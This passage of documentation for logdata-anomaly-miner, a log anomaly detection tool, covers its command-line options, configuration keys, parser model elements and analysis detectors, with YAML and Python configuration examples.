-------------------------- -r REMOVE, --remove REMOVE -------------------------- Remove a specific persistence directory. REMOVE must be the name of the directory and must not contain '/' or '.'. Usually this directory can be found in '/var/lib/aminer'. 
----------------------------- -R RESTORE, --restore RESTORE ----------------------------- Restore a persistence backup. RESTORE must be the name of the directory and must not contain '/' or '.'. Usually this directory can be found in '/var/lib/aminer'. ---------------- -f, --from-begin ---------------- Removes repositioning data before starting the aminer so that all input files will be analyzed starting from the first line in the file rather than the last previously analyzed line. ------------------ -o, --offline-mode ------------------ Stop the aminer after all logs have been processed. .. note:: This parameter is useful for forensic analysis. --------------------------------------------- --config-properties KEY=VALUE [KEY=VALUE ...] --------------------------------------------- Set a number of config_properties by using key-value pairs (do not put spaces before or after the = sign). If a value contains spaces, you should define it with double quotes: 'foo="this is a sentence". Note that values are always treated as strings. If values are already defined in the config_properties, the input types are converted to the ones already existing. ======================= Configuration Reference ======================= --------------------- General Configuration --------------------- LearnMode ~~~~~~~~~ * Type: boolean (True,False) * Default: False This options turns the LearnMode on globally. .. warning:: This option can be overruled by the learn_mode that is configurable per analysis component. .. code-block:: yaml LearnMode: True AminerUser ~~~~~~~~~~ * Default: aminer This option defines the system-user that owns the aminer-process. .. code-block:: yaml AminerUser: 'aminer' AminerGroup ~~~~~~~~~~~ * Default: aminer This option defines the system-group that owns the aminer-process. .. code-block:: yaml AminerGroup: 'aminer' AnalysisConfigFile ~~~~~~~~~~~~~~~~~~ * Default: None This (optional) configuration file contains the whole analysis child configuration (code). 
When missing, those configuration parameters are also taken from the main config. Because this file is python code executed by aminer, it must only be writable by trusted users.
code-block:: yaml Core.PersistenceDir: '/var/lib/aminer' Core.PersistencePeriod ~~~~~~~~~~~~~~~~~~~~~~ * Type: Number of seconds * Default: 600 This options controls whether the logdata-anomaly-miner should write its persistency to disk. .. code-block:: yaml Core.PersistencePeriod: 600 Core.LogDir ~~~~~~~~~~~ * Default: /var/lib/aminer/log Directory for logfiles. This directory must be writeable to the 'AminerUser'. .. code-block:: yaml Core.LogDir: '/var/lib/aminer/log' MailAlerting.TargetAddress ~~~~~~~~~~~~~~~~~~~~~~~~~~ * Default: disabled Define a target e-mail address to send alerts to. When undefined, no e-mail notification hooks are added. .. code-block:: yaml MailAlerting.TargetAddress: 'root@localhost' MailAlerting.FromAddress ~~~~~~~~~~~~~~~~~~~~~~~~ Sender address of e-mail alerts. When undefined, "sendmail" implementation on host will decide, which sender address should be used. .. code-block:: yaml MailAlerting.FromAddress: 'root@localhost' MailAlerting.SubjectPrefix ~~~~~~~~~~~~~~~~~~~~~~~~~~ * Default: "aminer Alerts" Define, which text should be prepended to the standard aminer subject. .. code-block:: yaml MailAlerting.SubjectPrefix: 'aminer Alerts:' MailAlerting.AlertGraceTime ~~~~~~~~~~~~~~~~~~~~~~~~~~~ * Type: Number of seconds * Default: 0 (any event can immediately trigger alerting) Define a grace time after startup before aminer will react to an event and send the first alert e-mail. .. code-block:: yaml MailAlerting.AlertGraceTime: 0 MailAlerting.EventCollectTime ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * Type: Number of seconds * Default: 10 Define how many seconds to wait after a first event triggered the alerting procedure before really sending out the e-mail. In that timespan, events are collected and will be sent all using a single e-mail. .. 
code-block:: yaml MailAlerting.EventCollectTime: 10 MailAlerting.MinAlertGap ~~~~~~~~~~~~~~~~~~~~~~~~ * Type: Number of seconds * Default: 600 Define the minimum time between two alert e-mails in seconds to avoid spamming. All events during this timespan are collected and sent out with the next report. .. code-block:: yaml MailAlerting.MinAlertGap: 600 MailAlerting.MaxAlertGap ~~~~~~~~~~~~~~~~~~~~~~~~ * Type: Number of seconds * Default: 600 Define the maximum time between two alert e-mails in seconds. When undefined this defaults to "MailAlerting.MinAlertGap". Otherwise this will activate an exponential backoff to reduce messages during permanent error states by increasing the alert gap by 50% when more alert-worthy events were recorded while the previous gap time was not yet elapsed. .. code-block:: yaml MailAlerting.MaxAlertGap: 600 MailAlerting.MaxEventsPerMessage ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ * Type: Number of events * Default: 1000 Define how many events should be included in one alert mail at most. .. code-block:: yaml MailAlerting.MaxEventsPerMessage: 1000 LogPrefix ~~~~~~~~~ This option defines the prefix for the output of each anomaly. .. code-block:: yaml LogPrefix: '' Log.Encoding ~~~~~~~~~~~~ * Type: string * Default: 'utf-8' This option defines the encoding of the logfiles. .. code-block:: yaml Log.Encoding: 'utf-8' Log.StatisticsPeriod ~~~~~~~~~~~~~~~~~~~~ * Type: Number of seconds * Default: 3600 Defines how often to write into stat-logfiles. .. code-block:: yaml Log.StatisticsPeriod: 3600 Log.StatisticsLevel ~~~~~~~~~~~~~~~~~~~ * Type: Number of loglevel * Default: 1 Defines the loglevel for the stat logs. .. code-block:: yaml Log.StatisticsLevel: 2 Log.DebugLevel ~~~~~~~~~~~~~~ * Type: Number of loglevel * Default: 1 Defines the loglevel of the aminer debug-logfile. .. 
code-block:: yaml Log.DebugLevel: 2 Log.RemoteControlLogFile ~~~~~~~~~~~~~~~~~~~~~~~~ * Type: string (path to the logfile) * Default: '/var/lib/aminer/log/aminerRemoteLog.txt' Defines the path of the logfile for the RemoteControl. .. code-block:: yaml Log.RemoteControlLogFile: '/var/log/aminerremotecontrol.log' Log.StatisticsFile ~~~~~~~~~~~~~~~~~~ * Type: string (path to the logfile) * Default: '/var/lib/aminer/log/statistics.log' Defines the path of the stats-file. .. code-block:: yaml Log.StatisticsFile: '/var/log/aminer-stats.log' Log.DebugFile ~~~~~~~~~~~~~~~~~~ * Type: string (path to the logfile) * Default: '/var/lib/aminer/log/aminer.log' Defines the path of the debug-log-file. .. code-block:: yaml Log.DebugFile: '/var/log/aminer.log' Log.Rotation.MaxBytes ~~~~~~~~~~~~~~~~~~~~~ * Type: number of bytes * Default: 1048576 (1 Megabyte) Defines the number of bytes before "Log.RemoteControlLogFile", "Log.StatisticsFile" and "Log.DebugFile" is rotated. .. code-block:: yaml Log.Rotation.MaxBytes: 1048576 Log.Rotation.BackupCount ~~~~~~~~~~~~~~~~~~~~~~~~ * Type: number of old logfiles * Default: 5 Defines the number of logfiles saved after rotation of "Log.RemoteControlLogFile", "Log.StatisticsFile" and "Log.DebugFile". .. code-block:: yaml Log.Rotation.BackupCount: 5 ----- Input ----- timestamp_paths ~~~~~~~~~~~~~~~ * Type: string or list of strings Parser paths to DateTimeModelElements to set timestamp of log events. .. code-block:: yaml timestamp_paths: '/model/time' .. code-block:: yaml timestamp_paths: - '/parser/model/time' - '/parser/model/type/execve/time' - '/parser/model/type/proctitle/time' - '/parser/model/type/syscall/time' - '/parser/model/type/path/time' multi_source ~~~~~~~~~~~~ * Type: boolean (True,False) * Default: False Flag to enable chronologically correct parsing from multiple input-logfiles. .. code-block:: yaml multi_source: True eol_sep ~~~~~~~ * Default: '\n' End of Line seperator for events. .. note:: Enables parsing of multiline logs. 
.. code-block:: yaml eol_sep: '\r\n' json_format ~~~~~~~~~~~ * Type: boolean (True,False) * Default: False Enables parsing of logs in json-format. .. code-block:: yaml json_format: True suppress_unparsed ~~~~~~~~~~~~~~~~~ * Default: False Boolean value that allows to suppress anomaly output about unparsed log atoms. .. code-block:: yaml suppress_unparsed: True ------- Parsing ------- There are some predefined standard-model-elements like *IpAddressDataModelElement*, *DateTimeModelElement*, *FixedDataModelElement* and so on. They are located in the python-source-tree of logdata-anomaly-miner. A comprehensive list of all possible standard-model-elements can be found below. Using these standard-model-elements it is possible to create custom parser models. Currently there are two methods of doing it: 1. Using a python-script that is located in */etc/aminer/conf-enabled*: .. code-block:: python """ /etc/aminer/conf-enabled/ApacheAccessParsingModel.py""" from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement def get_model(): """Return a model to parse Apache Access logs from the AIT-LDS.""" alphabet = b'!"#$%&\'()*+,-./0123456789:;<>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\^_`abcdefghijklmnopqrstuvwxyz{|}~=[]' model = SequenceModelElement('model', [ 
FirstMatchModelElement('client_ip', [ IpAddressDataModelElement('client_ip'), FixedDataModelElement('localhost', b'::1') ]), FixedDataModelElement('sp1', b' '), VariableByteDataModelElement('client_id', alphabet), FixedDataModelElement('sp2', b' '), VariableByteDataModelElement('user_id', alphabet), FixedDataModelElement('sp3', b' ['), DateTimeModelElement('time', b'%d/%b/%Y:%H:%M:%S'), FixedDataModelElement('sp4', b' +'), DecimalIntegerValueModelElement('tz'), FixedDataModelElement('sp5', b'] "'), FirstMatchModelElement('fm', [ FixedDataModelElement('dash', b'-'), SequenceModelElement('request', [ FixedWordlistDataModelElement('method', [ b'GET', b'POST', b'PUT', b'HEAD', b'DELETE', b'CONNECT', b'OPTIONS', b'TRACE', b'PATCH']), FixedDataModelElement('sp6', b' '), DelimitedDataModelElement('request', b' ', b'\\'), FixedDataModelElement('sp7', b' '), DelimitedDataModelElement('version', b'"'), ]) ]), FixedDataModelElement('sp8', b'" '), DecimalIntegerValueModelElement('status_code'), FixedDataModelElement('sp9', b' '), DecimalIntegerValueModelElement('content_size'), OptionalMatchModelElement( 'combined', SequenceModelElement('combined', [ FixedDataModelElement('sp10', b' "'), DelimitedDataModelElement('referer', b'"', b'\\'), FixedDataModelElement('sp11', b'" "'), DelimitedDataModelElement('user_agent', b'"', b'\\'), FixedDataModelElement('sp12', b'"'), ])), ]) return model This parser can be used as "type" in **/etc/aminer/config.yml**: .. code-block:: yaml Parser: - id: 'apacheModel' type: ApacheAccessModel name: 'apache' .. warning:: Please do not create files with the ending "ModelElement.py" in /etc/aminer/conf-enabled! 2. Configuring the parser-model inline in **/etc/aminer/config.yml** .. 
code-block:: yaml Parser: - id: host_name_model type: VariableByteDataModelElement name: 'host' args: '-.01234567890abcdefghijklmnopqrstuvwxyz:' - id: identity_model type: VariableByteDataModelElement name: 'ident' args: '-.01234567890abcdefghijklmnopqrstuvwxyz:' - id: user_name_model type: VariableByteDataModelElement name: 'user' args: '0123456789abcdefghijklmnopqrstuvwxyz.-' - id: new_time_model type: DateTimeModelElement name: 'time' date_format: '[%d/%b/%Y:%H:%M:%S +0000]' - id: sq3 type: FixedDataModelElement name: 'sq3' args: ' "' - id: request_method_model type: FixedWordlistDataModelElement name: 'method' args: - 'GET' - 'POST' - 'PUT' - 'HEAD' - 'DELETE' - 'CONNECT' - 'OPTIONS' - 'TRACE' - 'PATCH' - id: request_model type: VariableByteDataModelElement name: 'request' args: '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.-/()[]{}!$%&=?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]()^_`abcdefghijklmnopqrstuvwxyz{|}~' - id: timestamp_model type: DateTimeModelElement name: 'timestamp' date_format: '%Y-%m-%dT%H:%M:%S+00:00' - id: optional_model type: OptionalMatchModelElement name: 'opt' args: timestamp_model - id: 'START' start: True type: JsonStringModelElement name: accesslog strict: True ignore_null: False key_parser_dict: "time": optional_model "agent": agent .. warning:: This parser does not work with multiline json-logs .. note:: Use OptionalMatchModelElement to make the subparser optional with null-values OptionalMatchModelElement ~~~~~~~~~~~~~~~~~~~~~~~~~ This model allows to define optional model elements. * **args**: the id of the optional element that will be skipped if it does not match .. code-block:: yaml Parser: - id: user type: FixedDataModelElement name: 'User' args: 'User ' - id: opt type: OptionalMatchModelElement name: 'opt' args: user RepeatedElementDataModelElement ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This model allows to define elements that repeat a number of times. * **args**: a string or list containing the following parameters: 1. 
repeated_element: id of element which is repeated 2. min_repeat: minimum amount of times the repeated element has to occur, default is 1 3. max_repeat: minimum amount of times the repeated element has to occur, default is 1048576 .. code-block:: yaml Parser: - id: delimitedDataModelElement type: DelimitedDataModelElement name: 'DelimitedDataModelElement' consume_delimiter: True delimiter: ';' - id: repeatedElementDataModelElement type: RepeatedElementDataModelElement name: 'RepeatedElementDataModelElement' args: - sequenceModelElement - 3 SequenceModelElement ~~~~~~~~~~~~~~~~~~~~ This model defines a sequence of elements that all have to match. * **args**: a list of elements that form the sequence .. code-block:: yaml Parser: - id: user type: FixedDataModelElement name: 'User' args: 'User ' - id: username type: DelimitedDataModelElement name: 'Username' consume_delimiter: True delimiter: ' ' - id: ip type: IpAddressDataModelElement name: 'IP' - id: seq type: SequenceModelElement name: 'seq' args: - user - username - ip VariableByteDataModelElement ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This model defines a string of character bytes with variable length from a given alphabet. * **args**: string specifying the allowed characters .. code-block:: yaml Parser: - id: version type: VariableByteDataModelElement name: 'version' args: '0123456789.' WhiteSpaceLimitedDataModelElement ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This model defines a string that is delimited by a white space. .. code-block:: yaml Parser: - id: whiteSpaceLimitedDataModelElement type: WhiteSpaceLimitedDataModelElement name: 'WhiteSpaceLimitedDataModelElement' --------- Analysing --------- All detectors have the following parameters and may have additional specific parameters that are defined in the respective sections. * **id**: must be a unique string * **type**: must be an existing Analysis component (required) .. 
_AllowlistViolationDetector: AllowlistViolationDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~ This module defines a detector for log atoms not matching any allowlisted rule. * **allowlist_rules**: list of rules executed in same way as inside Rules.OrMatchRule.list of rules executed in same way as inside Rules.OrMatchRule (required, list of strings, defaults to empty list). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **output_event_handlers**: a list of event handler identifiers that the detector should forward the anomalies to (list of strings, defaults to empty list). * **output_logline**: a boolean that specifies whether full log event parsing information should be appended to the anomaly when set to True (boolean, defaults to False). .. code-block:: yaml Analysis: - type: PathExistsMatchRule id: path_exists_match_rule1 path: "/model/LoginDetails/PastTime/Time/Minutes" - type: ValueMatchRule id: value_match_rule path: "/model/LoginDetails/Username" value: "root" - type: OrMatchRule id: or_match_rule sub_rules: - "path_exists_match_rule1" - "value_match_rule" - type: AllowlistViolationDetector id: Allowlist allowlist_rules: - "or_match_rule" .. seealso:: :ref:`MatchRules` CharsetDetector ~~~~~~~~~~~~~~~ This detector generates anomalies for new characters in parsed elements and extends the allowed alphabet when learning is active. * **paths** parser paths of values to be analyzed; multiple paths mean that all values occurring in these paths are considered for character detection (required, list of strings). * **id_path_list** list of strings that specify group identifiers for which alphabets should be learned (list of strings, defaults to empty list). * **persistence_id** the name of the file where the learned models are stored (string, defaults to "Default"). * **learn_mode** specifies whether value ranges should be extended when values outside of ranges are observed (boolean). 
* **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean). * **ignore_list**: a list of parser paths that are ignored for analysis by this detector (list of strings, defaults to empty list). * **constraint_list**: a list of parser paths that the detector will be constrained to, i.e., other branches of the parser tree are ignored (list of strings, defaults to empty list). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **output_event_handlers**: a list of event handler identifiers that the detector should forward the anomalies to (list of strings, defaults to empty list). .. code-block:: yaml Analysis: - type: 'CharsetDetector' paths: - '/parser/value' learn_mode: True EnhancedNewMatchPathValueComboDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ In addition to detecting new value combination (see NewMatchPathValueComboDetector), this detector also stores combo occurrence times and amounts, and allows to execute functions on tuples that need to be defined in the python code first. * **paths**: the list of values to extract from each match to create the value combination to be checked (required, list of strings). * **allow_missing_values**: when set to True, the detector will also use matches, where one of the paths from target_path_list does not refer to an existing parsed data object (boolean, defaults to False). * **tuple_transformation_function**: when not None, this function will be invoked on each extracted value combination list to transform it. It may modify the list directly or create a new one to return it (string, defaults to None). * **learn_mode**: when set to True, this detector will report a new value only the first time before including it in the known values set automatically (boolean). * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). 
* **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **output_event_handlers**: a list of event handler identifiers that the detector should forward the anomalies to (list of strings, defaults to empty list). * **output_logline**: a boolean that specifies whether full log event parsing information should be appended to the anomaly when set to True (boolean, defaults to False). .. code-block:: yaml Analysis: - type: EnhancedNewMatchPathValueComboDetector id: EnhancedNewValueCombo paths: - "/model/DailyCron/UName" - "/model/DailyCron/JobNumber" tuple_transformation_function: "demo" learn_mode: True EntropyDetector ~~~~~~~~~~~~~~ This detector monitors and learns occurrence probabilities of character pairs in values. Many unlikely character pairs in values suggest that they are randomly generated or not fitting the learned character patterns. * **paths** parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are considered as if they occur in the same field (required, list of strings). * **prob_thresh** limit for the average probability of character pairs for which anomalies are reported (float, defaults to 0.05). * **default_probs** initializes the probabilities with default values from https://github.com/markbaggett/freq (boolean, defaults to False). * **skip_repetitions** boolean that determines whether only distinct values are used for character pair counting. This counteracts the problem of imbalanced word frequencies that distort the frequency table generated in a single aminer run (boolean, defaults to False). * **persistence_id** name of persistency document (string, defaults to "Default"). * **learn_mode** when set to True, the detector will extend the table of character pair frequencies based on new values (boolean). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to False). 
* **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **output_event_handlers**: a list of event handler identifiers that the detector should forward the anomalies to (list of strings, defaults to empty list). .. code-block:: yaml Analysis: - type: 'EntropyDetector' paths: - '/parser/value' prob_thresh: 0.05 default_freqs: false skip_repetitions: false learn_mode: True EventCorrelationDetector ~~~~~~~~~~~~~~~~~~~~~~~~ This module defines an evaluator and generator for event rules. The overall idea of generation is 1. For each processed event A, randomly select another event B occurring within queue_delta_time. 2. If B chronologically occurs after A, create the hypothesis A => B (observing event A implies that event B must be observed within current_time+queue_delta_time). If B chronologically occurs before A, create the hypothesis B <= A (observing event A implies that event B must be observed within currentTime-queueDeltaTime). 3. Observe for a long time (max_observations) whether the hypothesis holds. 4. If the hypothesis holds, transform it to a rule. Otherwise, discard the hypothesis. * **paths**: a list of paths where values or value combinations used for correlation occur. If this parameter is not set, correlation is done on event types instead (list of strings, defaults to empty list). * **output_event_handlers**: a list of event handler identifiers that the detector should forward the anomalies to (list of strings, defaults to empty list). * **max_hypotheses** maximum amount of hypotheses and rules hold in memory (integer, defaults to 1000). * **hypothesis_max_delta_time** time span in seconds of events considered for hypothesis generation (float, defaults to 5.0). * **generation_probability** probability in [0, 1] that currently processed log line is considered for hypothesis with each of the candidates (float, defaults to 1.0). 
* **generation_factor** likelihood in [0, 1] that currently processed log line is added to the set of candidates for hypothesis generation (float, defaults to 1.0). * **max_observations** maximum amount of evaluations before hypothesis is transformed into a rule or discarded or rule is evaluated (integer, defaults to 500). * **p0** expected value for hypothesis evaluation distribution (float, defaults to 0.9). * **alpha** confidence value for hypothesis evaluation (float, defaults to 0.05). * **candidates_size** maximum number of stored candidates used for hypothesis generation (integer, defaults to 10). * **hypotheses_eval_delta_time** duration in seconds between hypothesis evaluation phases that remove old hypotheses that are likely to remain unused (float, 120.0). * **delta_time_to_discard_hypothesis** time span in seconds required for old hypotheses to be discarded (float, defaults to 180.0). * **check_rules_flag** specifies whether existing rules are evaluated (boolean, defaults to True). * **ignore_list**: a list of parser paths that are ignored for analysis by this detector (list of strings, defaults to empty list). * **constraint_list**: a list of parser paths that the detector will be constrained to, i.e., other branches of the parser tree are ignored (list of strings, defaults to empty list). * **output_logline**: a boolean that specifies whether full log event parsing information should be appended to the anomaly when set to True (boolean, defaults to False). * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **learn_mode**: specifies whether new hypotheses and rules are generated (boolean). .. 
code-block:: yaml Analysis: - type: EventCorrelationDetector id: EventCorrelationDetector check_rules_flag: True hypothesis_max_delta_time: 1.0 learn_mode: True EventCountClusterDetector ~~~~~~~~~~~~~~~~~~~~~~~~~ This module defines a detector that clusters count vectors of event and value occurrences. * **paths** parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed (list of strings, defaults to empty list). * **output_event_handlers** for handling events, e.g., print events to stdout (list of strings, defaults to empty list). * **window_size** the length of the time window for counting in seconds (float, defaults to 600). * **id_path_list** parser paths of values for which separate count vectors should be generated (list of strings, defaults to empty list). * **num_windows** the number of vectors stored in the models (integer, defaults to 50). * **confidence_factor** minimum similarity threshold in range [0, 1] for detection (float, defaults to 0.33). * **idf** when true, value counts are weighted higher when they occur with fewer id_paths (requires that id_path_list is set) (boolean, defaults to False). * **norm** when true, count vectors are normalized so that only relative occurrence frequencies matter for detection (boolean, defaults to False). * **add_normal** when true, count vectors are also added to the model when they exceed the similarity threshold (boolean, defaults to False). * **check_empty_windows** when true, empty count vectors are generated for time windows without event occurrences (boolean, defaults to False). * **persistence_id** name of persistence document (string, defaults to "Default"). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to False). 
* **ignore_list** list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted (list of strings, defaults to empty list).
Default value is 0.33 = 3 * sigma deviation. confidence_factor must be in range [0, 1] (float, defaults to 0.33). * **empty_window_warnings** whether anomalies should be generated for too small window sizes. * **early_exceeding_anomaly_output** states if an anomaly should be raised the first time the appearance count exceeds the range. * **set_lower_limit** sets the lower limit of the frequency test to the specified value. * **set_upper_limit** sets the upper limit of the frequency test to the specified value. * **learn_mode** specifies whether new frequency measurements override ground truth frequencies (boolean). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to False). * **ignore_list** list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted (list of strings, defaults to empty list). * **constraint_list** list of paths that have to be present in the log atom to be analyzed (list of strings, defaults to empty list). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). .. code-block:: yaml Analysis: - type: EventFrequencyDetector id: EventFrequencyDetector window_size: 10 EventSequenceDetector ~~~~~~~~~~~~~~~~~~~~~ This module defines a detector for event and value sequences. The concept is based on STIDE which was first published by Forrest et al. * **paths** parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed (list of strings, defaults to empty list). * **output_event_handlers** for handling events, e.g., print events to stdout (list of strings, defaults to empty list). 
* **id_path_list** one or more paths that specify the trace of the sequence detection, i.e., incorrect sequences that are generated by interleaved events can be avoided when event sequence identifiers are available (list of strings, defaults to empty list). * **seq_len** the length of the sequences to be learned (larger lengths increase precision, but may overfit the data). (integer, defaults to 3). * **learn_mode** specifies whether newly observed sequences should be added to the learned model (boolean). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to False). * **ignore_list** list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted (list of strings, defaults to empty list). * **constraint_list** list of paths that have to be present in the log atom to be analyzed (list of strings, defaults to empty list). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). .. code-block:: yaml Analysis: - type: EventSequenceDetector id: EventSequenceDetector seq_len: 4 paths: - '/model/type/syscall/syscall' id_path_list: - '/model/type/syscall/id' EventTypeDetector ~~~~~~~~~~~~~~~~~ This component serves as a basis for the VariableTypeDetector, VariableCorrelationDetector, TSAArimaDetector and PathArimaDetector. It saves a list of the values to the single paths and tracks the time for the TSAArimaDetector. * **paths** parser paths of values to be analyzed (list of strings, defaults to empty list). * **id_path_list** one or more paths that specify the trace of the sequence detection, i.e., incorrect sequences that are generated by interleaved events can be avoided when event sequence identifiers are available (list of strings, defaults to empty list). 
* **allow_missing_id** specifies whether log atoms without id path should be omitted (boolean, defaults to False; only relevant if id_path_list is set). * **allowed_id_tuples** list of the allowed id tuples. Log atoms with id tuples not in this list are not analyzed, when this list is not empty. * **persistence_id** the name of the file where the learned models are stored (string, defaults to "Default"). * **max_num_vals** maximum number of lines in the value list before it is reduced (integer, defaults to 1500). * **min_num_vals** number of the values which the list is being reduced to (integer, defaults to 1000). * **save_values** if False the values of the paths are not saved for further analysis. The values are not needed for the TSAArimaDetector (boolean, defaults to True). .. code-block:: yaml Analysis: - type: 'EventTypeDetector' id: ETD id_path_list: - '/model/type/syscall/id' allow_missing_id: True save_values: False .. _HistogramAnalysis: HistogramAnalysis ~~~~~~~~~~~~~~~~~ This component performs a histogram analysis on one or more input properties. The properties are parsed values denoted by their parsing path. Those values are then handed over to the selected "binning function", that calculates the histogram bin. * Binning: Binning can be done using one of the predefined binning functions or by creating own subclasses from "HistogramAnalysis.BinDefinition". * LinearNumericBinDefinition: Binning function working on numeric values and sorting them into bins of same size. * ModuloTimeBinDefinition: Binning function working on parsed datetime values but applying a modulo function to them. This is useful for analysis of periodic activities. * **histogram_defs**: list of tuples. First element of the tuple contains the target property path to analyze. The second element contains the id of a bin_definition(LinearNumericBinDefinition or ModuloTimeBinDefinition). List(strings) **Required** * **report_interval**: Report_interval delay in seconds between creation of two reports. 
The parameter is applied to the parsed record data time, not the system time. Hence reports can be delayed when no data is received. Integer(min: 1) **Required** * **reset_after_report_flag**: Zero counters after the report was sent. Boolean(Default: true) * **persistence_id**: the name of the file where the learned models are stored. String(Default: 'Default') * **output_logline**: specifies whether the full parsed log atom should be provided in the output. Boolean(Default: false) * **output_event_handlers**: List of event-handler-id to send the report to. List(strings) * **suppress**: a boolean that suppresses anomaly output of that detector when set to True. Boolean(Default: false) .. code-block:: yaml Analysis: - type: LinearNumericBinDefinition id: linear_numeric_bin_definition lower_limit: 50 bin_size: 5 bin_count: 20 outlier_bins_flag: True - type: HistogramAnalysis id: HistogramAnalysis histogram_defs: [["/model/RandomTime/Random", "linear_numeric_bin_definition"]] report_interval: 10 .. _PathDependentHistogramAnalysis: PathDependentHistogramAnalysis ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This component creates a histogram for only a single input property, e.g. an IP address, but for each group of correlated match paths. Assume there are two paths that include the input property but they separate after the property was found on the path. This might be for example the client IP address in ssh log atoms, where the parsing path may split depending on whether this was a log atom for a successful login, logout or some error. This analysis component will then create separate histograms, one for the path common to all atoms and one for each disjunct part of the subpaths found. The component uses the same binning functions as the standard HistogramAnalysis.HistogramAnalysis, see documentation there. * **path**: The property-path. String(Required) * **bin_definition**: The id of a bin_definition(LinearNumericBinDefinition or ModuloTimeBinDefinition). 
String(Required) * **report_interval**: Report_interval delay in seconds between creation of two reports. The parameter is applied to the parsed record data time, not the system time. Hence reports can be delayed when no data is received. Integer(min: 1) * **reset_after_report_flag**: Zero counters after the report was sent. Boolean(Default: true) * **persistence_id**: the name of the file where the learned models are stored. String(Default: 'Default') * **output_logline**: specifies whether the full parsed log atom should be provided in the output. Boolean(Default: false) * **output_event_handlers**: List of event-handler-id to send the report to. List(strings) * **suppress**: a boolean that suppresses anomaly output of that detector when set to True. Boolean(Default: false) .. code-block:: yaml Analysis: - type: ModuloTimeBinDefinition id: modulo_time_bin_definition modulo_value: 86400 time_unit: 3600 lower_limit: 0 bin_size: 1 bin_count: 24 outlier_bins_flag: True - type: PathDependentHistogramAnalysis id: PathDependentHistogramAnalysis path: "/model/RandomTime" bin_definition: "modulo_time_bin_definition" report_interval: 10 LinearNumericBinDefinition ~~~~~~~~~~~~~~~~~~~~~~~~~~ Binning function working on numeric values and sorting them into bins of same size. * **lower_limit**: Start on lowest bin. Integer or Float **Required** * **bin_size**: Size of bin in reporting units. Integer(min 1) **Required** * **bin_count**: Number of bins. Integer(min 1) **Required** * **outlier_bins_flag**: Disable outlier bins. Boolean. Default: False * **output_event_handlers**: List of handlers to send the report to. * **suppress**: a boolean that suppresses anomaly output of that detector when set to True. .. code-block:: yaml Analysis: - type: LinearNumericBinDefinition id: linear_numeric_bin_definition lower_limit: 50 bin_size: 5 bin_count: 20 outlier_bins_flag: True .. 
seealso:: :ref:`HistogramAnalysis` ModuloTimeBinDefinition ~~~~~~~~~~~~~~~~~~~~~~~ Binning function working on parsed datetime values but applying a modulo function to them. This is useful for analysis of periodic activities. * **modulo_value**: Modulo value in seconds. * **time_unit**: Division factor to get down to the reporting unit. * **lower_limit**: Start on lowest bin. Integer or Float **Required** * **bin_size**: Size of bin in reporting units. Integer(min 1) **Required** * **bin_count**: Number of bins. Integer(min 1) **Required** * **outlier_bins_flag**: Disable outlier bins. Boolean. Default: False * **output_event_handlers**: List of handlers to send the report to. * **suppress**: a boolean that suppresses anomaly output of that detector when set to True. .. code-block:: yaml Analysis: - type: ModuloTimeBinDefinition id: modulo_time_bin_definition modulo_value: 86400 time_unit: 3600 lower_limit: 0 bin_size: 1 bin_count: 24 outlier_bins_flag: True .. seealso:: :ref:`PathDependentHistogramAnalysis` MatchFilter ~~~~~~~~~~~ This component creates events for specified paths and values. * **paths**: List of paths defined as strings(Required) * **value_list**: List of values(Required) * **output_logline**: Defines if logline should be added to the output. Boolean(Default: False) * **output_event_handlers**: List of strings with id's of the event_handlers * **suppress**: a boolean that suppresses anomaly output of that detector when set to True. .. code-block:: yaml Analysis: - type: MatchFilter id: MatchFilter paths: - "/model/Random" value_list: - 1 - 10 - 100 MatchValueAverageChangeDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This detector calculates the average of a given list of values to monitor. Reports are generated if the average of the latest values diverges 